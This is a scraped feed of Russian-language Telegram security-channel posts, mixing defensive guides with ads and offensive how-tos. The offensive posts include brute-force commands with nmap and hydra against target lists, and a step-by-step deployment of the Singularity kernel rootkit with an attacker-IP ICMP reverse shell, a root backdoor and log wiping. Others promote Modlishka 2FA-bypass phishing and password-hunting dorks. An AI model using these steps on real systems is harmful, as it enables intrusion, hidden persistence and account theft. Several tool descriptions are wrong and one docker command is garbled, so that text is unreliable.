CodeGuard: CyberSec Edition

😈 Атаки на IoT-устройства: практические примеры и Linux-команды для защиты В 2025 году атаки на умные устройства продолжают стремительно расти. Злоумышленники используют массовое сканирование и автоматический подбор паролей для взлома камер, роутеров и других IoT-девайсов. 🟫 Полезные команды для Linux — поиск и защита IoT:

# Сканируем сеть на устройства с открытым Telnet/SSH (быстрый поиск уязвимых IoT)
sudo nmap -p 22,23 --open --script ssh-brute,ftp-brute -iL targets.txt

# Поиск IoT в интернете через Shodan
shodan host <ip_устройства>

# Проверка открытых портов и сервисов на IoT устройстве
nmap -sV <ip_устройства>

# Мониторинг сетевого трафика для поиска подозрительных соединений
tcpdump -i eth0 port 23 or port 22

# Проверка слабых паролей через Hydra brute force (например, для Telnet)
hydra -l admin -P /usr/share/wordlists/rockyou.txt telnet://<ip_устройства>

🔐 Советы по защите: - Следите, чтобы на устройствах не было стандартных паролей и WPS отключён - Настраивайте сегментацию сети — отделяйте IoT от ключевой инфраструктуры - Обновляйте прошивки и следите за уязвимостями производителя - Используйте IDS/IPS для обнаружения аномалий в трафике - Внедряйте многофакторную аутентификацию, где возможно

📚 Подробнее в статьях: — Securitymedia.org — Codeby.net

Своевременные меры и регулярный мониторинг снижает риски IoT-инцидентов 😈 CodeGuard | Chat

💰 Как вкатиться в DevOps бесплатно?  Сообщество академии GigaDevOps - настоящая находка с огромным количеством качественного материала в этой сфере. Как для новичков, так и для продвинутых в этой сфере. ⚡️У ребят есть своё комьюнити: там есть живой чат с senior-devops, мок-собесы, смол-токи: и всё это совершенно бесплатно.   GigaDevOps специализируется на профессиональном менторинге до оффера, где идет упор на практику и индивидуальный подход. Хотите сменить грейд или выйти на более высокий доход с личным ментором? Подпишись на Telegram-канал и получи МАКСИМАЛЬНУЮ СКИДКУ в честь распродажи на 11.11 + бесплатную консультацию по твоему кейсу.  👉Начать осваивать высокооплачиваемую и незафоршенную профессию прямо сейчас!

👩‍💻[Перевод] Можно ли было обнаружить бэкдор XZ при более продуманной работе с пакетами в Git и Debian? Обнаружение бэкдора в XZ Utils весной 2024 года поразило опенсорс-сообщество и подняло серьёзные вопросы о безопасности цепочки поставок ПО. В этом посте мы изучим, могло ли улучшение практик работы с пакетами Debian помочь в выявлении этой угрозы, приведём руководство по аудиту пакетов и предложим улучшения на будущее. 📂 Перейти к статье 😈 CodeGuard | Chat

😵‍💫 Singularity — мощный Linux Kernel Rootkit для современных ядер 6х Singularity — это модуль ядра Linux, разработанный для современных версий ядра (6.x), способный скрывать своё присутствие и обеспечивать скрытый контроль над системой.

🔥 Основные возможности: - Сокрытие процессов через фильтрацию на уровне syscall, скрывает процессы из /proc, ps, top и других системных команд - Скрытие файлов и директорий по заданным шаблонам (например, «singularity») - Скрытие сетевых портов, включая фильтрацию /proc/net/*, скрывает порт 8081 от ss, netstat, lsof - Эскалация привилегий с помощью сигнала kill -59 PID или переменной окружения MAGIC=mtz bash для получения root доступа - Скрытая обратная связь по ICMP-сигналу (magic ICMP packet) для запуска скрытого обратного шелла - Скрытие модуля ядра из списков, журналов ядра (dmesg), фильтрация логов для удаления следов - Блокировка механизмов трассировки и отладки системы, таких как debugfs, ftrace, BPF программы - Нормализация индикаторов taint ядра для устранения признаков загрузки несертифицированных модулей

🛠 Установка:

cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
# Перед компиляцией измените IP в modules/icmp.c на IP атакующего
make
sudo insmod singularity.ko
sudo bash scripts/journal.sh
sudo bash scripts/x.sh

💡 Использование (примеры): — Скрыть процесс с PID:

kill -59 <PID>

— Получить root shell:

MAGIC=mtz bash

— Скрыть открытый порт Откройте порт 8081, он останется невидимым для системных инструментов — Запуск обратного шелла через ICMP: На атакующей машине запустите слушатель и выполните скрипт:

sudo python3 scripts/singularity_icmp_trigger.py <IP_цели>

📚 Источники: GitHub, Blog.kyntra.io Singularity — это вызов для специалистов по цифровой криминалистике и безопасности, настоящий «финальный босс» Linux rootkit, который сложен для обнаружения и удаления ставь реакцию, для тебя это легко — для меня мотивация 👍 😈 CodeGuard | Chat

⚡ Совет на 2025 год — не трать деньги на дорогие IT-курсы! Обучение стоит дорого, поэтому в Telegram появились обучающие каналы по всем IT-направлениям: 👩‍💻 Python – @python_tg 👩‍💻 Frontend – @frontend_tg 💻 InfoSec & Хакинг – @infosec_tg 👩‍💻 Java – @java_tg 👩‍💻 C / C++ – @plusplus_tg 👩‍💻 C# & GameDev – @csharp_tg 👩‍💻 Data Science – @datascience_tg 👩‍💻 DevOps – @devops_tg 👩‍💻 Linux – @linux_tg 👩‍💻 Весь IT – @techno_tg 👩‍💻 Курсы IT – @itcourse_tg 🤖 ChatGPT для IT — @chatgpt Не плати за то, что можно получить бесплатно — подписывайся и учись!

😈 Инструмент для пентеста: обход двухфакторной аутентификации с Modlishka Modlishka — это open-source инструмент для penetration testing, написанный на Go. Он работает с сетевыми протоколами HTTP(S), TLS, WebSocket и др., позволяя перехватывать и анализировать трафик между жертвой и целевым сайтом. 💡 Modlishka реализует метод Adversary-in-the-Middle (AitM), который позволяет не только перехватывать логины и пароли, но и обходить многие виды 2FA/МFA (двухфакторной аутентификации). Жертва вводит коды двухфакторной защиты, но Modlishka перехватывает сессионные cookies и токены, что дает злоумышленнику полный доступ к аккаунту. 🚀 Инструмент включает множество скриптов для аудита безопасности веб-приложений с 2FA. Это один из первых публичных инструментов, показавших как автоматизировать фишинговые атаки с обходом 2FA и увеличением шансов успешного взлома. 📥 Репозиторий на GitHub 😈 CodeGuard | Chat

😎 DorkGPT — помощник в создании Google Dorks с ИИ DorkGPT — это онлайн-инструмент на базе искусственного интеллекта, который автоматизирует создание эффективных Google Dorks для поиска уязвимостей и скрытой информации. 🔥 Практические шаги: 1. Перейдите на сайт DorkGPT 2. Введите описание задачи, например: "Найти общедоступные конфигурационные файлы с паролями" 3. Получите сгенерированный запрос — можно сразу копировать и использовать для поиска в Google. 4. Для автоматизации с Linux используйте утилиту googler для работы с Google из командной строки:

sudo apt install googler
googler "site:example.com filetype:env password"

5. Собирайте результаты в файл и анализируйте их с помощью jq:

googler --json "inurl:wp-config.php" | jq '.[].link'

6. Для массовой проверки URL применяйте httpx

cat urls.txt | httpx -silent -status-code

🔗 Полезные ссылки: — Официальный сайт DorkGPT — Статья Google Dorking или используем Гугл на максимум — Ресурсы и базы Google Dorks

DorkGPT + Linux-инструменты — мощное сочетание для быстрого и точного OSINT и пентеста. 😈 CodeGuard | Chat

В Яндексе платят 300.000р, Сбер нуждается в инженерах, а в Тинькофф нехватка кадров «Бигтех по-русски» — место, где разработчики из крупных компаний рассказывают правду о работе мечты, зарплатах и жизни в IT. Присоединяйся: @bigtech

😈 Использование контейнеров и виртуализации для безопасного тестирования Контейнеры и виртуальные машины — базовые технологии для безопасного выполнения тестов и экспериментов с минимальными рисками для основной системы. 🟫 Примеры команд запуска и управления контейнерами:

# Запуск контейнера с Ubuntu для тестов
docker run -it --rm ubuntu bash

# Просмотр активных контейнеров
docker ps

# Получение списка образов
docker images

# Остановка и удаление контейнера
docker stop ontainer_idid> && docker rm ontainerer_id>

📌 Виртуализация (KVM, VMware, VirtualBox) — полная изоляция с эмуляцией аппаратного обеспечения: — Виртуальные машины запускают отдельную ОС, что даёт высокий уровень изоляции и контроль — Подходит для сложных сценариев тестирования, где нужно менять ядро, конфигурацию оборудования или ОС — Можно создавать снапшоты для отката после экспериментов — Требует больше ресурсов и времени на настройку по сравнению с контейнерами 🛠 Пример создания ВМ с KVM:

# Создание виртуальной машины с помощью virt-install
virt-install --name testvm --memory 2048 --vcpus 2 --disk size=20 --cdrom /path/to/os.iso --network network=default

⚡️ Рекомендации по безопасности: — Обновляйте хост и гостевые системы, чтобы не было уязвимостей — Изолируйте сети виртуальных сред от основной инфраструктуры — Используйте политики SELinux, AppArmor, seccomp для ограничения прав контейнеров — Сканируйте образы контейнеров на уязвимости (например, с помощью Trivy)

📚 Подробнее: - https://7universum.com/ru/tech/archive/item/13725 - https://www.kaspersky.ru/blog/container-security/36087/ - https://habr.com/ru/companies/vk/articles/652149/

😈 CodeGuard | Chat

😈 Kali Linux vs BlackArch — выбор дистрибутива для пентеста Новичкам рекомендуется Kali Linux — это Debian-базированный дистрибутив, где всё готово к работе из коробки. Установка и конфигурация просты, инструменты для тестирования уже предустановлены, что позволяет быстро стартовать в пентесте. 🔥 BlackArch — для опытных пользователей, которые хотят глубже понять Linux и самостоятельно настраивать систему. Основан на Arch Linux, предлагает около 3000 свежих инструментов для пентеста, но требует больше времени на установку и поддержку из-за отсутствия графического установщика и необходимости ручной настройки служб.

🟫 Вывод: - Kali Linux — отличный выбор для быстрого начала и стабильной работы - BlackArch — подходит тем, кто хочет полный контроль, гибкость и свежие пакеты, готов инвестировать своё время в настройку системы

🔗 Подробный обзор и сравнение 😈 CodeGuard | Chat

🛡 Топ самых интересных CVE за октябрь 2025 года В этой подборке представлены самые интересные уязвимости за октябрь 2025 года.Подведем вместе итоги второго осеннего месяца, поехали!

Навигация по уязвимостям ➡️ Уязвимости в решении Oracle E-Business Suite ➡️ Выполнение произвольного кода в Redis ➡️ Критическая уязвимость в движке Unity ➡️ Выполнение произвольных команд Figma MCP ➡️ Исправленные уязвимости в Microsoft ➡️ Чтение произвольных файлов в плагине WordPress

📁 Можете глянуть 😈 CodeGuard | Chat

👩‍💻 Всем программистам посвящается! Вот 17 авторских обучающих IT каналов по самым востребованным областям программирования: Выбирай своё направление: 👩‍💻 Python — t.me/python_ready 🤔 InfoSec & Хакинг — t.me/hacking_ready 🖥 SQL & Базы Данных — t.me/sql_ready 🤖 Нейросети — t.me/neuro_ready 👩‍💻 C/C++ — https://t.me/cpp_ready 👩‍💻 C# & Unity — t.me/csharp_ready 👩‍💻 Java — t.me/java_ready 👩‍💻 IT Новости — t.me/it_ready 👩‍💻 Linux — t.me/linux_ready 🖼️ DevOps — t.me/devops_ready 👩‍💻 Bash & Shell — t.me/bash_ready 🖥 Data Science — t.me/data_ready 🐞 QA-тестирование — t.me/qa_ready 📖 IT Книги — t.me/books_ready 👩‍💻 Frontend — t.me/frontend_ready 📱 JavaScript — t.me/javascript_ready 👩‍💻 Backend — t.me/backend_ready 📱 GitHub & Git — t.me/github_ready 🖥 Design — t.me/design_ready 📌 Гайды, шпаргалки, задачи, ресурсы и фишки для каждого языка программирования!

🛡 Как защищать API-интерфейсы от взлома и утечек — практический гайд с советами и командами API — это ключевой компонент современных сервисов, но зачастую становится мишенью атак и утечек данных. Ниже — комплекс мер для защиты с примерами. 🚀 Шаг 1. Аутентификация и авторизация - Используйте проверенные протоколы: OAuth 2.0, OpenID Connect, JWT с подписью - Назначайте роли и права доступа (RBAC, ABAC) — минимизируйте права пользователей - Пример в OpenAPI:

securitySchemes:
  BearerAuth:
    type: http
    scheme: bearer
    bearerFormat: JWT

🔐 Шаг 2. Шифрование - Все соединения должны идти через HTTPS с TLS 1.2+ - На сервере храните чувствительные данные в зашифрованном виде (AES-256, bcrypt для паролей) - Пример настройки TLS в Nginx:

ssl_protocols TLSv1.2 TLSv1.3;
ssl_ciphers HIGH:!aNULL:!MD5;

⚡️ Шаг 3. Ограничение запросов и защита от DDoS - Устанавливайте квоты на количество запросов (rate limiting) - Используйте WAF с правилами для API - Пример в Nginx с лимитом:

limit_req_zone $binary_remote_addr zone=api_limit:10m rate=5r/s;
server {
  location /api/ {
    limit_req zone=api_limit burst=10 nodelay;
  }
}

🛠 Шаг 4. Валидация и санитизация входящих данных - Проверяйте типы и значения параметров - Используйте параметризованные запросы к БД для защиты от SQL-инъекций - Санитизируйте и экранируйте вход для предотвращения XSS и других инъекций 📊 Шаг 5. Логирование и мониторинг — Записывайте успешные и неудачные запросы — Следите за подозрительными паттернами запросов и автоматическими атаками — Есть смысл интегрировать с SIEM/EDR 🔎 Защищённый API — это основа надёжности, которая отсекает почти все классические угрозы. 😈 CodeGuard | Chat

✅ Учим Wazuh искать уязвимости Народный SIEM Wazuh активно используется специалистами ИБ в различных организациях. Он может собирать и анализировать события безопасности получаемые с источников, генерировать уведомления об инцидентах и строить отчеты. Однако, было бы неплохо, чтобы он еще умел подавать кофе производить оценку конфигурации безопасности. Оценка безопасности конфигурации — это процесс проверки соответствия всех систем набору предопределенных правил, касающихся параметров конфигурации и разрешенного использования приложений. Одним из наиболее надежных способов обеспечения безопасности ресурсов сети является усиление их защищенности. Таким образом, оценка безопасности конфигурации — это эффективный способ выявить слабые места в ваших конечных точках и устранить их, чтобы уменьшить вероятность атаки. 📁 Интересно? Тогда сюда 😈 CodeGuard | Chat

⚡️ ChatGPT, Sora 2, Veo 3 — всё это ДЕТСКИЕ ИГРУШКИ по сравнению с профессиональными ИИ, которых нет в публичном доступе Такими находками делится анонимный хакер в закрытом канале «Доктор GPT». Например? • Spectator V+ — профессиональная слежка за людьми в соцсетях: лайки, подписки репосты даже на закрытых аккаунтах. • Agenta — инструмент военной разведки, отслеживающий ракеты и БПЛА в воздухе. • Daytona AI — бесплатный генератор реалистичных видео и фото БЕЗ ЦЕНЗУРЫ И ОГРАНИЧЕНИЙ. И это ещё цветочки. Внутри — полный фарш, с которым вы станете почти всемогущим. Пользуйтесь с умом.

💻 Hunner — мощный фреймворк для пентеста Если бы инструменты тестирования безопасности были рок-звездами, Hunner занял бы место хэдлайнера. Это набор скриптов, который автоматизирует рутинные проверки и помогает находить распространённые веб-уязвимости.

🧩 Функционал Hunner включает: 1. SQL-сканирование для выявления уязвимых мест в базах данных. 2. XSS-сканирование для поиска точек внедрения вредоносного JavaScript. 3. DOS-тесты для проверки устойчивости (только с разрешения!). 4. Bruteforce FTP — атаки на тестовые учётные данные. 5. Bruteforce SSH — проверка надёжности SSH-креденшел. 6. Bruteforce почтовых аккаунтов (для тестовых данных).

🐱 Репозиторий и подробности 😈 CodeGuard | Chat

The Dark - приватный канал от специалиста по цифровой криминалистике. • Годные OSINT инструменты; • Нейросети; • Malware Analysis Впервые открыт свободный вход Welcome to The Dark

🔒 Подборка уязвимых сред и программ для тренировки в информационной безопасности: 1. bWAPP — бесплатное уязвимое веб-приложение с открытым исходным кодом, идеально подходит для изучения разных видов атак в контролируемой среде. 2. Damn Vulnerable Web Application (DVWA) — классика для отработки навыков пентеста с уровнями сложности и разнообразными веб-уязвимостями. 3. Damn Vulnerable Web Services — платформа для изучения уязвимостей веб-сервисов с практикой. 4. OWASP Broken Web Applications Project — набор уязвимых веб-приложений для комплексной тренировки. 5. OWASP Mutillidae II — учебное веб-приложение с широким спектром уязвимостей и настройками безопасности. 6. Samurai Web Testing Framework — специализированный фреймворк для тестирования веб-уязвимостей с готовым окружением. 7. Web Security Dojo — обучающее окружение с набором инструментов и уязвимых приложений для практики. Эти инструменты помогут практиковать и углублять знания по кибербезопасности в безопасной среде. 😈 CodeGuard | Chat

✅ DNSSEC и DNS: как доменные имена управляют интернетом + настройка BIND на Ubuntu Все мы любим, когда интернет работает (и не виснет 🙂) — сайты открываются, видео грузятся, письма доходят. Но мало кто задумывается, как именно браузер узнаёт, куда вас отправить, когда вы вводите знакомое «habr.com».  Эта статья для тех, кто хочет понять, как именно устроена и работает система доменных имён, её защита на уровне DNSSEC и почему эта технология важна для безопасности интернета. Если вы техно-гик и не боитесь деталей — добро пожаловать под кат! Так как DNSSEC — надстройка над DNS, сначала нужно объяснить самое простое. Чтобы понять друг друга, мы с вами общаемся (слишком логично, я понимаю). Например, к вам подошёл прохожий и спросил: «как пройти на улицу Ленина?». Вы ему показали, объяснили маршрут и он пошёл по указанному пути и пришёл куда надо. 📁 Читать полностью на Хабре 😈CodeGuard | Chat

🔎 Обзор полезных инструментов для пентестера В море известных инструментов для пентеста всегда можно найти несколько скрытых жемчужин, которые делают аудит эффективнее и интереснее. Вот подборка полезного софта, который стоит попробовать, если хочешь выделиться среди пентестеров. 🔥 Anew — автоматизированный фреймворк для сбора информации и разведки. Поддерживает массовый сбор поддоменов, открытых портов и данных с зовнишних API.

anew -d example.com -o output.txt

😆 SubOver — инструмент для поиска поддоменов с помощью пассивных и активных методов, включая bruteforce с уникальными словарями.

subover -d example.com

🛡 Sn1per — автоматизированный скрипт для показа багов и уязвимостей, объединяет более 100 пентест-утилит в одном наборе. Отлично подходит для быстрого и глубокого исследования.

sn1per -t target.com -m passive

😄 Httpx — ультрабыстрый инструмент для проверки живых URL, анализа заголовков и SSL-сертификатов, с большим потенциалом для кастомизации.

httpx -l urls.txt -ssl -title

🎣 Gau (GetAllUrls) — позволяет за секунды вытащить все возможные URL целевого домена из различных публичных источников и кэшей.

gau example.com > urls.txt

💡 QTester — Python-инструмент для автоматизации SQL-инъекций и XSS с анализом пригодности payload’ов. Полезен на этапах ручного и полуавтоматического тестирования.

Рекомендую для изучения: — https://github.com/projectdiscovery/anew — https://github.com/Ice3man543/SubOver — https://github.com/1N3/Sn1per — https://github.com/projectdiscovery/httpx — https://github.com/lc/gau — https://github.com/QTester

Погружайся глубже😂 , автоматизируй быстрее и не забывай ставить 👍) 😈 CodeGuard | Chat